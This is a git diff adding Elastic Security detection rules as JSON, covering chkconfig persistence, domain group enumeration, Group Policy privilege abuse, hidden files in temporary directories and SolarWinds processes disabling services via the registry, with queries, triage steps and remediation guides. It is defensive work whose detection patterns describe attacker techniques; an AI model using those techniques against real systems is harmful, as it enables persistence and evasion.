!{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n- Investigate abnormal behaviors by the subject process/user such as network connections, file modifications, and any other spawned child processes.\n - Investigate listening ports and open sockets to look for potential command and control traffic or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses the `chkconfig` binary for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042\n- Potential Persistence Through Run Control Detected - 0f4d35e4-925e-4959-ab24-911be207ee6f\n- Potential Persistence Through init.d Detected - 474fd20e-14cc-49c5-8160-d9ab4ba16c8b\n- New Systemd Timer Created - 7fb500fa-8e24-4bd1-9480-2a819352602c\n- New Systemd Service Created by Previously Unknown Process - 17b0a495-4d9f-414c-8ad0-92f018b8e001\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and\n( \n (process.executable : \"/usr/sbin/chkconfig\" and process.args : \"--add\") or\n (process.args : \"*chkconfig\" and process.args : \"--add\")\n) and \nnot process.parent.name in (\"rpm\", \"qualys-scan-util\", \"qualys-cloud-agent\", \"update-alternatives\") and\nnot process.parent.args : (\"/var/tmp/rpm*\", \"/var/lib/waagent/*\")\n", + "references": [ + "https://www.intezer.com/blog/research/lightning-framework-new-linux-threat/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b910f25a-2d44-47f2-a873-aabdc0d355e6", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Threat: Lightning Framework", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1037", + "name": "Boot or Logon Initialization Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/", + "subtechnique": [ + { + "id": "T1037.004", + "name": "RC Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "b910f25a-2d44-47f2-a873-aabdc0d355e6_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b92d5eae-70bb-4b66-be27-f98ba9d0ccdc_2.json b/packages/security_detection_engine/kibana/security_rule/b92d5eae-70bb-4b66-be27-f98ba9d0ccdc_2.json new file mode 100644 index 00000000000..bcd6a10dfe6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b92d5eae-70bb-4b66-be27-f98ba9d0ccdc_2.json @@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the execution of Linux built-in commands related to account or group enumeration. Adversaries may use account and group information to orient themselves before deciding how to act.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Discovery of Domain Groups", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and (\n process.name in (\"ldapsearch\", \"dscacheutil\") or (process.name == \"dscl\" and process.args : \"*-list*\")\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "b92d5eae-70bb-4b66-be27-f98ba9d0ccdc", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1069", + "name": "Permission Groups Discovery", + "reference": "https://attack.mitre.org/techniques/T1069/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "b92d5eae-70bb-4b66-be27-f98ba9d0ccdc_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_109.json b/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_109.json new file mode 100644 index 00000000000..03fa1717662 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_109.json @@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the first occurrence of a modification to Group Policy Object Attributes to add privileges to user accounts or use them to add users as local admins.", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Group Policy Abuse for Privilege Addition", + "note": "## Triage and analysis\n\n### Investigating Group Policy Abuse for Privilege Addition\n\nGroup Policy Objects (GPOs) can be used to add rights and/or modify Group Membership on GPOs by changing the contents of an INF file named GptTmpl.inf, which is responsible for storing every setting under the Security Settings container in the GPO. This file is unique for each GPO, and only exists if the GPO contains security settings. Example Path: \"\\\\DC.com\\SysVol\\DC.com\\Policies\\{PolicyGUID}\\Machine\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf\"\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `GptTmpl.inf` file, and under the `Privilege Rights` section, look for potentially dangerous high privileges, for example: SeTakeOwnershipPrivilege, SeEnableDelegationPrivilege, etc.\n- Inspect the user security identifiers (SIDs) associated with these privileges, and if they should have these privileges.\n\n### False positive analysis\n\n- Inspect whether the user that has done the modifications should be allowed to. The user name can be found in the `winlog.event_data.SubjectUserName` field.\n\n### Related rules\n\n- Scheduled Task Execution at Scale via GPO - 15a8ba77-1c13-4274-88fe-6bd14133861e\n- Startup/Logon Script added to Group Policy Object - 16fac1a1-21ee-4ca6-b720-458e3855d046\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scripts attached.\n", + "query": "event.code: \"5136\" and\n winlog.event_data.AttributeLDAPDisplayName:\"gPCMachineExtensionNames\" and\n winlog.event_data.AttributeValue:(*827D319E-6EAC-11D2-A4EA-00C04F79F83A* and *803E14A0-B4FB-11D0-A0D0-00A0C90F574B*)\n", + "references": [ + "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0025_windows_audit_directory_service_changes.md", + "https://labs.f-secure.com/tools/sharpgpoabuse" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeLDAPDisplayName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeValue", + "type": "unknown" + } + ], + "risk_score": 73, + "rule_id": "b9554892-5e0e-424b-83a0-5aef95aa43bf", + "setup": "## Setup\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Active Directory", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1484", + "name": "Domain Policy Modification", + "reference": "https://attack.mitre.org/techniques/T1484/", + "subtechnique": [ + { + "id": "T1484.001", + "name": "Group Policy Modification", + "reference": "https://attack.mitre.org/techniques/T1484/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 109 + }, + "id": "b9554892-5e0e-424b-83a0-5aef95aa43bf_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_109.json b/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_109.json new file mode 100644 index 00000000000..fe74f312798 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_109.json @@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Users can mark specific files as hidden simply by putting a \".\" as the first character in the file or folder name. Adversaries can use this to their advantage to hide files and folders on the system for persistence and defense evasion. This rule looks for hidden files or folders in common writable directories.", + "false_positives": [ + "Certain tools may create hidden temporary files or directories upon installation or as part of their normal behavior. These events can be filtered by the process arguments, username, or process name values." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 33, + "name": "Creation of Hidden Files and Directories via CommandLine", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and\nprocess.working_directory in (\"/tmp\", \"/var/tmp\", \"/dev/shm\") and\nprocess.args regex~ \"\"\"\\.[a-z0-9_\\-][a-z0-9_\\-\\.]{1,254}\"\"\" and\nnot process.name in (\"ls\", \"find\", \"grep\", \"git\", \"jq\", \"basename\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.working_directory", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b9666521-4742-49ce-9ddc-b8e84c35acae", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/", + "subtechnique": [ + { + "id": "T1564.001", + "name": "Hidden Files and Directories", + "reference": "https://attack.mitre.org/techniques/T1564/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "b9666521-4742-49ce-9ddc-b8e84c35acae_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_110.json b/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_110.json new file mode 100644 index 00000000000..aefce80cae5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_110.json @@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Users can mark specific files as hidden simply by putting a \".\" as the first character in the file or folder name. Adversaries can use this to their advantage to hide files and folders on the system for persistence and defense evasion. This rule looks for hidden files or folders in common writable directories.", + "false_positives": [ + "Certain tools may create hidden temporary files or directories upon installation or as part of their normal behavior. These events can be filtered by the process arguments, username, or process name values." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 33, + "name": "Creation of Hidden Files and Directories via CommandLine", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and\nprocess.working_directory in (\"/tmp\", \"/var/tmp\", \"/dev/shm\") and\nprocess.args regex~ \"\"\"\\.[a-z0-9_\\-][a-z0-9_\\-\\.]{1,254}\"\"\" and\nnot process.name in (\"ls\", \"find\", \"grep\", \"git\", \"jq\", \"basename\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.working_directory", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b9666521-4742-49ce-9ddc-b8e84c35acae", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/", + "subtechnique": [ + { + "id": "T1564.001", + "name": "Hidden Files and Directories", + "reference": "https://attack.mitre.org/techniques/T1564/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "b9666521-4742-49ce-9ddc-b8e84c35acae_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_108.json b/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_108.json new file mode 100644 index 00000000000..279ecbc4adc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_108.json @@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a SolarWinds binary modifying the start type of a service to be disabled. An adversary may abuse this technique to manipulate relevant security services.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "SolarWinds Process Disabling Services via Registry", + "query": "registry where host.os.type == \"windows\" and registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\Start\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\Start\"\n ) and\n registry.data.strings : (\"4\", \"0x00000004\") and\n process.name : (\n \"SolarWinds.BusinessLayerHost*.exe\",\n \"ConfigurationWizard*.exe\",\n \"NetflowDatabaseMaintenance*.exe\",\n \"NetFlowService*.exe\",\n \"SolarWinds.Administration*.exe\",\n \"SolarWinds.Collector.Service*.exe\",\n \"SolarwindsDiagnostics*.exe\")\n", + "references": [ + "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b9960fef-82c6-4816-befa-44745030e917", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Initial Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + }, + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1195", + "name": "Supply Chain Compromise", + "reference": "https://attack.mitre.org/techniques/T1195/", + "subtechnique": [ + { + "id": "T1195.002", + "name": "Compromise Software Supply Chain", + "reference": "https://attack.mitre.org/techniques/T1195/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "b9960fef-82c6-4816-befa-44745030e917_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_109.json b/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_109.json new file mode 100644 index 00000000000..d896bb77378 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_109.json @@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a SolarWinds binary modifying the start type of a service to be disabled. An adversary may abuse this technique to manipulate relevant security services.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "SolarWinds Process Disabling Services via Registry", + "query": "registry where host.os.type == \"windows\" and registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\Start\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\Start\"\n ) and\n registry.data.strings : (\"4\", \"0x00000004\") and\n process.name : (\n \"SolarWinds.BusinessLayerHost*.exe\",\n \"ConfigurationWizard*.exe\",\n \"NetflowDatabaseMaintenance*.exe\",\n \"NetFlowService*.exe\",\n \"SolarWinds.Administration*.exe\",\n \"SolarWinds.Collector.Service*.exe\",\n \"SolarwindsDiagnostics*.exe\")\n", + "references": [ + "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ 